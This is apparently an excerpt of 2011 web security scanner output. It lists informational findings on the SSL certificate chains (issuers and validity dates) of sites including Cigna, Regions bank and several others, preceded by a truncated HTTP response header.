| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 498 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=QPwMR Set-Cookie: hubspotutk=86af4891-a613 Date: Mon, 16 May 2011 17:07:56 GMT Set-Cookie: HUBSPOT39=252777644.0 var hsUse20Servers = true; var hsDayEndsIn = 39123; var hsWeekEndsIn = 557523; var hsMonthEndsIn = 1335123; var hsAnalyticsServer = "tracking.hubspot.com"; var hsTimeStamp = "2011-05-16 13:07 ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | / | 
| Issued to: | cignaforhcp.cigna.com | 
| Issued by: | VeriSign Class 3 Secure Server CA - G3 | 
| Valid from: | Mon Jan 24 18:00:00 CST 2011 | 
| Valid to: | Wed Jan 25 17:59:59 CST 2012 | 
| Issued to: | VeriSign Class 3 Secure Server CA - G3 | 
| Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Valid from: | Sun Feb 07 18:00:00 CST 2010 | 
| Valid to: | Fri Feb 07 17:59:59 CST 2020 | 
| Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Valid from: | Tue Nov 07 18:00:00 CST 2006 | 
| Valid to: | Wed Jul 16 18:59:59 CDT 2036 | 
| Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Valid from: | Tue Nov 07 18:00:00 CST 2006 | 
| Valid to: | Wed Jul 16 18:59:59 CDT 2036 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | / | 
| Issued to: | my.cigna.com | 
| Issued by: | VeriSign Class 3 Secure Server CA - G2 | 
| Valid from: | Tue Jan 25 18:00:00 CST 2011 | 
| Valid to: | Thu Jan 26 17:59:59 CST 2012 | 
| Issued to: | VeriSign Class 3 Secure Server CA - G2 | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Tue Mar 24 19:00:00 CDT 2009 | 
| Valid to: | Sun Mar 24 18:59:59 CDT 2019 | 
| Issued to: | VeriSign Trust Network | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Sun May 17 19:00:00 CDT 1998 | 
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 | 
| Issued to: | VeriSign Trust Network | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Sun May 17 19:00:00 CDT 1998 | 
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secure.regio | 
| Path: | / | 
| Issued to: | secure.regionsmortgage.com | 
| Issued by: | VeriSign Class 3 Extended Validation SSL SGC CA | 
| Valid from: | Tue Feb 01 18:00:00 CST 2011 | 
| Valid to: | Thu Feb 02 17:59:59 CST 2012 | 
| Issued to: | VeriSign Class 3 Extended Validation SSL SGC CA | 
| Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Valid from: | Tue Nov 07 18:00:00 CST 2006 | 
| Valid to: | Mon Nov 07 17:59:59 CST 2016 | 
| Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Issued by: | Class 3 Public Primary Certification Authority | 
| Valid from: | Tue Nov 07 18:00:00 CST 2006 | 
| Valid to: | Sun Nov 07 17:59:59 CST 2021 | 
| Issued to: | Class 3 Public Primary Certification Authority | 
| Issued by: | Class 3 Public Primary Certification Authority | 
| Valid from: | Sun Jan 28 18:00:00 CST 1996 | 
| Valid to: | Wed Aug 02 18:59:59 CDT 2028 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | / | 
| Issued to: | secureapps.regions.com | 
| Issued by: | VeriSign Class 3 International Server CA - G3 | 
| Valid from: | Wed May 04 19:00:00 CDT 2011 | 
| Valid to: | Sat May 05 18:59:59 CDT 2012 | 
| Issued to: | VeriSign Class 3 International Server CA - G3 | 
| Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Valid from: | Sun Feb 07 18:00:00 CST 2010 | 
| Valid to: | Fri Feb 07 17:59:59 CST 2020 | 
| Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Issued by: | Class 3 Public Primary Certification Authority | 
| Valid from: | Tue Nov 07 18:00:00 CST 2006 | 
| Valid to: | Sun Nov 07 17:59:59 CST 2021 | 
| Issued to: | Class 3 Public Primary Certification Authority | 
| Issued by: | Class 3 Public Primary Certification Authority | 
| Valid from: | Sun Jan 28 18:00:00 CST 1996 | 
| Valid to: | Wed Aug 02 18:59:59 CDT 2028 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | / | 
| Issued to: | securebank.regions.com | 
| Issued by: | VeriSign Class 3 Secure OFX CA - G3 | 
| Valid from: | Wed Feb 02 18:00:00 CST 2011 | 
| Valid to: | Fri Feb 03 17:59:59 CST 2012 | 
| Issued to: | VeriSign Class 3 Secure OFX CA - G3 | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Tue Mar 31 19:00:00 CDT 2009 | 
| Valid to: | Sun Mar 31 18:59:59 CDT 2019 | 
| Issued to: | VeriSign Trust Network | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Sun May 17 19:00:00 CDT 1998 | 
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | / | 
| Issued to: | sso.corp.cigna.com | 
| Issued by: | VeriSign Class 3 Secure Server CA - G2 | 
| Valid from: | Wed Mar 23 19:00:00 CDT 2011 | 
| Valid to: | Fri Mar 23 18:59:59 CDT 2012 | 
| Issued to: | VeriSign Class 3 Secure Server CA - G2 | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Tue Mar 24 19:00:00 CDT 2009 | 
| Valid to: | Sun Mar 24 18:59:59 CDT 2019 | 
| Issued to: | VeriSign Trust Network | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Sun May 17 19:00:00 CDT 1998 | 
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 | 
| Issued to: | VeriSign Trust Network | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Sun May 17 19:00:00 CDT 1998 | 
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | / | 
| Issued to: | www.frontrowusa.com | 
| Issued by: | Go Daddy Secure Certification Authority | 
| Valid from: | Fri Jun 19 11:26:34 CDT 2009 | 
| Valid to: | Sun Jun 19 11:26:34 CDT 2011 | 
| Issued to: | Go Daddy Secure Certification Authority | 
| Issued by: | Go Daddy Class 2 Certification Authority | 
| Valid from: | Wed Nov 15 19:54:37 CST 2006 | 
| Valid to: | Sun Nov 15 19:54:37 CST 2026 | 
| Issued to: | Go Daddy Class 2 Certification Authority | 
| Issued by: | http://www.valicert.com/ | 
| Valid from: | Tue Jun 29 12:06:20 CDT 2004 | 
| Valid to: | Sat Jun 29 12:06:20 CDT 2024 | 
| Issued to: | http://www.valicert.com/ | 
| Issued by: | http://www.valicert.com/ | 
| Valid from: | Fri Jun 25 19:19:54 CDT 1999 | 
| Valid to: | Tue Jun 25 19:19:54 CDT 2019 | 
| Issued to: | http://www.valicert.com/ | 
| Issued by: | http://www.valicert.com/ | 
| Valid from: | Fri Jun 25 19:19:54 CDT 1999 | 
| Valid to: | Tue Jun 25 19:19:54 CDT 2019 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | / | 
| Issued to: | *.paperg.com | 
| Issued by: | Go Daddy Secure Certification Authority | 
| Valid from: | Tue Nov 30 15:10:42 CST 2010 | 
| Valid to: | Fri Dec 09 17:31:16 CST 2011 | 
| Issued to: | Go Daddy Secure Certification Authority | 
| Issued by: | Go Daddy Class 2 Certification Authority | 
| Valid from: | Wed Nov 15 19:54:37 CST 2006 | 
| Valid to: | Sun Nov 15 19:54:37 CST 2026 | 
| Issued to: | Go Daddy Class 2 Certification Authority | 
| Issued by: | http://www.valicert.com/ | 
| Valid from: | Tue Jun 29 12:06:20 CDT 2004 | 
| Valid to: | Sat Jun 29 12:06:20 CDT 2024 | 
| Issued to: | http://www.valicert.com/ | 
| Issued by: | http://www.valicert.com/ | 
| Valid from: | Fri Jun 25 19:19:54 CDT 1999 | 
| Valid to: | Tue Jun 25 19:19:54 CDT 2019 | 
| Issued to: | http://www.valicert.com/ | 
| Issued by: | http://www.valicert.com/ | 
| Valid from: | Fri Jun 25 19:19:54 CDT 1999 | 
| Valid to: | Tue Jun 25 19:19:54 CDT 2019 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.planservices | 
| Path: | / | 
| Issued to: | www.planservices.com | 
| Issued by: | VeriSign Class 3 Secure Server CA - G3 | 
| Valid from: | Sun Nov 28 18:00:00 CST 2010 | 
| Valid to: | Tue Nov 29 17:59:59 CST 2011 | 
| Issued to: | VeriSign Class 3 Secure Server CA - G3 | 
| Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Valid from: | Sun Feb 07 18:00:00 CST 2010 | 
| Valid to: | Fri Feb 07 17:59:59 CST 2020 | 
| Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 | 
| Issued by: | Class 3 Public Primary Certification Authority | 
| Valid from: | Tue Nov 07 18:00:00 CST 2006 | 
| Valid to: | Sun Nov 07 17:59:59 CST 2021 | 
| Issued to: | Class 3 Public Primary Certification Authority | 
| Issued by: | Class 3 Public Primary Certification Authority | 
| Valid from: | Sun Jan 28 18:00:00 CST 1996 | 
| Valid to: | Wed Aug 02 18:59:59 CDT 2028 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | / | 
| Issued to: | www.regions.com | 
| Issued by: | www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign | 
| Valid from: | Wed Jun 02 19:00:00 CDT 2010 | 
| Valid to: | Wed Jun 15 18:59:59 CDT 2011 | 
| Issued to: | www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign | 
| Issued by: | Class 3 Public Primary Certification Authority | 
| Valid from: | Wed Apr 16 19:00:00 CDT 1997 | 
| Valid to: | Mon Oct 24 18:59:59 CDT 2016 | 
| Issued to: | Class 3 Public Primary Certification Authority | 
| Issued by: | Class 3 Public Primary Certification Authority | 
| Valid from: | Sun Jan 28 18:00:00 CST 1996 | 
| Valid to: | Wed Aug 02 18:59:59 CDT 2028 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://wwwa.applyon | 
| Path: | / | 
| Issued to: | wwwa.applyonlinenow.com | 
| Issued by: | VeriSign Class 3 Secure Server CA - G2 | 
| Valid from: | Wed Sep 01 19:00:00 CDT 2010 | 
| Valid to: | Sun Sep 04 18:59:59 CDT 2011 | 
| Issued to: | VeriSign Class 3 Secure Server CA - G2 | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Tue Mar 24 19:00:00 CDT 2009 | 
| Valid to: | Sun Mar 24 18:59:59 CDT 2019 | 
| Issued to: | VeriSign Trust Network | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Sun May 17 19:00:00 CDT 1998 | 
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 | 
| Issued to: | VeriSign Trust Network | 
| Issued by: | VeriSign Trust Network | 
| Valid from: | Sun May 17 19:00:00 CDT 1998 | 
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 |